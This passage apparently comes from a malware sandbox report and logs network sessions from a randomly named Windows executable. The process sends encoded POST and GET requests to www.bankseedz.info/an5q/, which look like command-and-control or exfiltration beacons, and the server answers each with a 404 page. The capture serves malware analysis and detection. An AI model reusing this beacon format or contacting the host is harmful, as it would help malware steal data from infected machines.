                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Dec 9, 2024 06:58:26.256181955 CET1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                                                                  Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                                                  Dec 9, 2024 06:58:26.256195068 CET1236INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                                                                  Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                                                                                  Dec 9, 2024 06:58:26.256247044 CET1236INData Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                                                                                  Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                                                                                  Dec 9, 2024 06:58:26.256263971 CET896INData Raw: 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32
                                                                                  Data Ascii: 8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000
                                                                                  Dec 9, 2024 06:58:26.256275892 CET1236INData Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e
                                                                                  Data Ascii: ke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.6665
                                                                                  Dec 9, 2024 06:58:26.256393909 CET1236INData Raw: 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e
                                                                                  Data Ascii: 021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.00342
                                                                                  Dec 9, 2024 06:58:26.256406069 CET448INData Raw: 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30
                                                                                  Data Ascii: 00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.232
                                                                                  Dec 9, 2024 06:58:26.256462097 CET1236INData Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                                                                                  Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                                                  Dec 9, 2024 06:58:26.256474018 CET1236INData Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                                                                                  Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"
                                                                                  Dec 9, 2024 06:58:26.375915051 CET1236INData Raw: 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74
                                                                                  Data Ascii: oke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.74999446.30.211.38805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:58:32.425932884 CET832OUTPOST /an5q/ HTTP/1.1
                                                                                  Host: www.bankseedz.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.bankseedz.info
                                                                                  Referer: http://www.bankseedz.info/an5q/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 73 76 56 45 73 67 65 43 61 79 6c 75 2f 35 56 33 39 74 30 6c 41 72 49 63 79 58 59 66 49 78 4f 42 4d 41 2f 74 76 34 41 31 59 52 68 49 42 69 63 6e 4a 53 54 44 6c 48 36 75 69 76 71 44 79 6c 70 32 49 51 56 54 4f 70 53 6e 33 41 35 69 4a 78 70 33 4c 2f 6a 41 44 6f 71 61 49 50 32 4a 2f 49 67 65 54 30 63 54 53 78 32 6d 6e 39 61 67 73 38 48 31 63 52 4d 35 71 34 68 5a 38 58 51 6c 56 55 73 75 50 67 2b 53 4a 63 66 73 54 44 6f 74 34 59 4a 68 75 75 43 2b 48 6c 2f 77 73 66 63 57 4f 66 37 77 56 65 78 57 62 57 4a 71 33 66 70 61 59 49 69 68 70 4f 6b 49 63 71 59 6b 43 56 7a 31 55 34 45 35 2b 78 55 37 6d 7a 4b 67 2f 36 41 62 33 5a 46 7a 72 77 3d 3d
                                                                                  Data Ascii: PHM8hj-=svVEsgeCaylu/5V39t0lArIcyXYfIxOBMA/tv4A1YRhIBicnJSTDlH6uivqDylp2IQVTOpSn3A5iJxp3L/jADoqaIP2J/IgeT0cTSx2mn9ags8H1cRM5q4hZ8XQlVUsuPg+SJcfsTDot4YJhuuC+Hl/wsfcWOf7wVexWbWJq3fpaYIihpOkIcqYkCVz1U4E5+xU7mzKg/6Ab3ZFzrw==
                                                                                  Dec 9, 2024 06:58:33.669060946 CET738INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                  Date: Mon, 09 Dec 2024 05:58:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 564
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.74999546.30.211.38805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:58:35.089653015 CET852OUTPOST /an5q/ HTTP/1.1
                                                                                  Host: www.bankseedz.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.bankseedz.info
                                                                                  Referer: http://www.bankseedz.info/an5q/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 73 76 56 45 73 67 65 43 61 79 6c 75 74 4b 4e 33 78 75 63 6c 51 37 49 66 35 33 59 66 48 52 50 49 4d 41 6a 74 76 39 34 6c 59 6a 56 49 41 41 45 6e 49 54 54 44 73 58 36 75 36 66 71 47 38 46 6f 36 49 51 49 6b 4f 72 47 6e 33 41 74 69 4a 77 35 33 4c 4d 37 48 4d 59 71 59 41 76 32 48 69 59 67 65 54 30 63 54 53 78 4b 49 6e 35 2b 67 73 4d 33 31 63 77 4d 36 69 59 68 59 32 33 51 6c 65 30 73 71 50 67 2b 67 4a 64 54 4b 54 42 67 74 34 61 68 68 76 36 66 4d 4a 6c 2f 71 6f 66 64 6d 49 50 75 36 4e 63 6c 4b 53 46 68 76 75 75 42 47 51 65 6a 44 7a 73 6f 6b 43 37 67 66 47 58 58 44 44 65 5a 4d 38 77 51 6a 72 52 2b 42 67 4e 6c 78 36 4c 6b 33 39 49 62 31 44 66 48 79 61 6d 45 48 45 33 4f 6d 6b 76 32 77 76 72 77 3d
                                                                                  Data Ascii: PHM8hj-=svVEsgeCaylutKN3xuclQ7If53YfHRPIMAjtv94lYjVIAAEnITTDsX6u6fqG8Fo6IQIkOrGn3AtiJw53LM7HMYqYAv2HiYgeT0cTSxKIn5+gsM31cwM6iYhY23Qle0sqPg+gJdTKTBgt4ahhv6fMJl/qofdmIPu6NclKSFhvuuBGQejDzsokC7gfGXXDDeZM8wQjrR+BgNlx6Lk39Ib1DfHyamEHE3Omkv2wvrw=
                                                                                  Dec 9, 2024 06:58:36.369287014 CET738INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                  Date: Mon, 09 Dec 2024 05:58:36 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 564
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.74999646.30.211.38805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:58:37.786781073 CET1865OUTPOST /an5q/ HTTP/1.1
                                                                                  Host: www.bankseedz.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.bankseedz.info
                                                                                  Referer: http://www.bankseedz.info/an5q/
                                                                                  Content-Length: 1252
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 73 76 56 45 73 67 65 43 61 79 6c 75 74 4b 4e 33 78 75 63 6c 51 37 49 66 35 33 59 66 48 52 50 49 4d 41 6a 74 76 39 34 6c 59 6a 4e 49 42 7a 4d 6e 4a 77 72 44 2b 48 36 75 33 2f 71 48 38 46 6f 33 49 51 51 6f 4f 72 4c 53 33 43 56 69 62 67 6c 33 61 74 37 48 58 49 71 59 4d 50 32 47 2f 49 68 45 54 79 39 59 53 77 6d 49 6e 35 2b 67 73 50 2f 31 61 68 4d 36 67 59 68 5a 38 58 51 78 56 55 73 43 50 67 6d 77 4a 64 48 38 54 77 41 74 37 36 52 68 6f 50 44 4d 46 6c 2f 73 76 66 64 2b 49 50 79 35 4e 63 35 73 53 46 6c 46 75 76 31 47 42 76 4f 6c 69 2b 6f 65 58 71 77 53 4e 6b 37 48 44 4d 52 62 31 57 73 6f 6c 32 53 4e 69 73 70 66 2f 61 41 6f 6f 2f 36 33 64 50 2f 2b 55 6c 55 69 43 77 2f 76 35 4d 69 62 78 4c 58 4c 4f 46 7a 6e 7a 79 6e 5a 52 77 39 78 49 69 38 39 42 53 38 62 5a 77 4f 43 6b 79 49 53 6f 34 74 4d 6e 4b 35 71 48 46 31 64 4e 48 32 65 70 38 64 44 39 4d 68 72 41 7a 34 38 73 65 6a 31 53 34 55 2b 64 43 54 69 47 79 44 31 36 79 71 76 70 64 6d 50 31 34 62 4a 46 79 4c 33 67 73 6d 64 4a 6b 6f 63 39 33 [TRUNCATED]
                                                                                  Data Ascii: PHM8hj-=svVEsgeCaylutKN3xuclQ7If53YfHRPIMAjtv94lYjNIBzMnJwrD+H6u3/qH8Fo3IQQoOrLS3CVibgl3at7HXIqYMP2G/IhETy9YSwmIn5+gsP/1ahM6gYhZ8XQxVUsCPgmwJdH8TwAt76RhoPDMFl/svfd+IPy5Nc5sSFlFuv1GBvOli+oeXqwSNk7HDMRb1Wsol2SNispf/aAoo/63dP/+UlUiCw/v5MibxLXLOFznzynZRw9xIi89BS8bZwOCkyISo4tMnK5qHF1dNH2ep8dD9MhrAz48sej1S4U+dCTiGyD16yqvpdmP14bJFyL3gsmdJkoc93j8BYvZzW3k4D2KocNtzb1shV5aj3UsDcNWwaOas2p6RibYrBeB3nBatrdCD62eZXt0m7wWKbmyt+OQEEjmSW9acEAPP+fduXrto/aoKj+c3nwAjQecpqeBlA14dSwRRRCNKz62rA7SLwyD/Ym7Cl4NHXTkfcaU35LV6RcFPXno9BruPMEqDJhcJRJidBwk3/DeW6OjRjNMoINFV/G2ypus12C5LX05rJMLZoEPpHk5EYLKZyZykcf3ELYLt1is5MlaVq0g1Lgsqrolb1Mq1a5yMO+68+H+L3PpDWhMC1/S/9bn4GsbWkt5Z1kkwD7gLKyqnKuY954WriU0TF8YVsFqHAHvacjyE9LkH/vyd36jxyqHbuxyzc++U3NYRuCRqAa03Boi6WcnWSToAP0JiO2d4eARfOEaA3TzSzDqoMeVMq/lZp4J8tnbMnXlGBbpYAFjdOwRf9+VHt8CeKqQWt9TupDCCwXJT7BodpauGmcpvFdgngehVSP0ZHO0wCzVg2eoaG0D6mbaGJofb/BwE5b9xhzSrweuE3y5uYQ3L2+Tm5MFk/6cIfmf2Rh3DLfm2VZke/3gdhRH2b6B8gKjOS+HQ1bNtzqeeYqUzubMmUQWDqZzK9xCtKGs2+WEUV64FEre16+jPj8T7aLIDh2ywv9gQoSdN5GXtc5u [TRUNCATED]
                                                                                  Dec 9, 2024 06:58:39.013392925 CET738INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                  Date: Mon, 09 Dec 2024 05:58:38 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 564
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.74999746.30.211.38805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:58:40.581815004 CET561OUTGET /an5q/?PHM8hj-=ht9kvQ/be1JP/b8F6dsuUaMB3kIjPw/jKA2fsfIfXx0uGnoFDxCnsR3TxOuY1Ct1ICtwCZ7n9C9rVjVINs3eX7araPangYQRXR4uJHW7jN2yh/2XdhodgIRd1WkPDwc0LSaAOvXgTCEN&tHfx=9byl HTTP/1.1
                                                                                  Host: www.bankseedz.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 06:58:41.691179991 CET738INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                  Date: Mon, 09 Dec 2024 05:58:41 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 564
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
